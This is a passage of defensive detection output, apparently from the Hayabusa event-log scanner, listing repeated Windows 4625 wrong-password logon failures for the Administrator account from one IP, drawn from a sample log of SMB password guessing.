Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.058 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.133 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.220 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.386 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.419 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:57.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.540 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.627 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.664 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.746 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.786 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.866 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:57.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.255 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.502 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.543 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.659 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.787 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.823 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.864 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.912 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:58.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.148 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:59.489 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.542 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.912 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.079 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
